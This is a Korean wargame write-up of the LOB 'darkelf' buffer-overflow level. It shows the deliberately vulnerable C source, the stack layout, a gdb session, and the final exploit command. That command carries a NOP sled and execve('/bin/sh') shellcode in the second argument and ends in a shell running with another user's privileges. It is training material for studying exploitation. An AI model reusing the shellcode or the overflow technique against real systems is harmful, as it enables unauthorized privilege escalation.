[6] wolfman -> darkelf ( argv[2] 활용 )

2017. 11. 17. 13:18 | SystemHacking/LOB(BOF원정대)



wolfman / love eyuna

[wolfman@localhost wolfman]$ /bin/bash2

[wolfman@localhost wolfman]$ SHELL=/bin/bash2




[ darkelf.c ]

 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
extern char **environ;
 
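/*
 * darkelf.c — the LOB "darkelf" challenge target, reproduced as the listing
 * gives it (garbled characters on the argv[1][47] check and the final
 * memset restored; explicit `int` return type and `return 0` added so the
 * file builds with a modern compiler).
 *
 * argc/argv are the usual entry-point parameters; argv[1] is the only
 * argument the program reads. Exits with status 0 on every rejected input.
 *
 * Security notes (what the visible code does, not a fix):
 *  - argv[1][47] is read BEFORE the length check, so an argument shorter
 *    than 48 bytes makes this an out-of-bounds read past its terminator.
 *  - The length limit (48) is larger than sizeof(buffer) (40), so strcpy()
 *    can write up to 49 bytes (48 + NUL) into a 40-byte stack buffer: saved
 *    ebp and the return address are reachable. This is the intended
 *    vulnerability of the challenge; a bounded copy that rejects
 *    strlen(argv[1]) >= sizeof(buffer) would close it.
 *  - The "egghunter" loop zeroes every environment string and the
 *    "buffer hunter" zeroes buffer after use; nothing else on the stack or
 *    in argv is cleared.
 */
int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: wipe the contents of every environment string
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // Byte 47 of argv[1] must be 0xbf; read without a prior length check
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument (limit 48 > sizeof(buffer) == 40)
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);        // unbounded copy into 40-byte buffer
        printf("%s\n", buffer);

        // buffer hunter: clear the local buffer before returning
        memset(buffer, 0, 40);

        return 0;
}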
 


egg hunter + buffer hunter + check length of argv[1]


[ Stack 구조 ]

i

buffer         40byte     ----

saved ebp    4byte     첫 인자는 48byte까지만 입력가능하다

saved eip     RET        ----

argc

argv[0]

argv[1]

argv[2]


< 풀이 과정 >

이전 문제와 동일하게 두 번째 인자에 쉘 코드를 올려서 문제를 풀겠다


[wolfman@localhost wolfman]$ gdb -q darkelf.cp

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>:       push   %ebp

0x8048501 <main+1>:     mov    %ebp,%esp

0x8048503 <main+3>:     sub    %esp,44

....

0x804860e <main+270>:   call   0x8048430 <memset>

0x8048613 <main+275>:   add    %esp,12

0x8048616 <main+278>:   leave

(gdb) b *0x8048616

Breakpoint 1 at 0x8048616


(gdb) run $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf"') $(python -c 'print "B"*1024')

Starting program: /home/wolfman/darkelf.cp $(python -c 'print "A" * 44 + "\xbf\xbf\xbf\xbf"') $(python -c 'print "B"*1024')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒


Breakpoint 1, 0x8048616 in main ()

(gdb) x/24x $ebp-40

0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6d0:     0x00000000      0x00000000      0x41414141      0xbfbfbfbf <-- saved eip

0xbffff6e0:     0x00000000      0xbffff724      0xbffff734      0x40013868

0xbffff6f0:     0x00000003      0x08048450      0x00000000      0x08048471

0xbffff700:     0x08048500      0x00000003      0xbffff724      0x08048390

(gdb)

0xbffff710:     0x0804864c      0x4000ae60      0xbffff71c      0x40013e90

  [ argc ]               [ argv[0] ]             [ argv[1] ]            [ argv[2] ]

0xbffff720:     0x00000003      0xbffff820      0xbffff839      0xbffff86a <-- 두 번째 인자 주소


0xbffff730:     0x00000000      0xbffffc6b      0xbffffc7d      0xbffffc96

0xbffff740:     0xbffffcb5      0xbffffcd7      0xbffffce4      0xbffffea7

0xbffff750:     0xbffffec6      0xbffffee3      0xbffffef8      0xbfffff17


(gdb) x/s 0xbffff820

0xbffff820:      "/home/wolfman/darkelf.cp"


(gdb) x/s 0xbffff839

0xbffff839:      'A' <repeats 44 times>, "▒▒▒▒"


(gdb) x/s 0xbffff86a

0xbffff86a:      'B' <repeats 200 times>...




[ payload ]


[wolfman@localhost wolfman]$ ./darkelf $(python -c 'print "A" * 44 + "\x2c\xf7\xff\xbf"') $(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,▒▒▒

Segmentation fault


=> 보정작업


[wolfman@localhost wolfman]$ ./darkelf $(python -c 'print "A" * 44 + "\x2c\xf9\xff\xbf"') $(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,▒▒▒

bash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)

bash$ my-pass

euid = 506

kernel crashed

bash$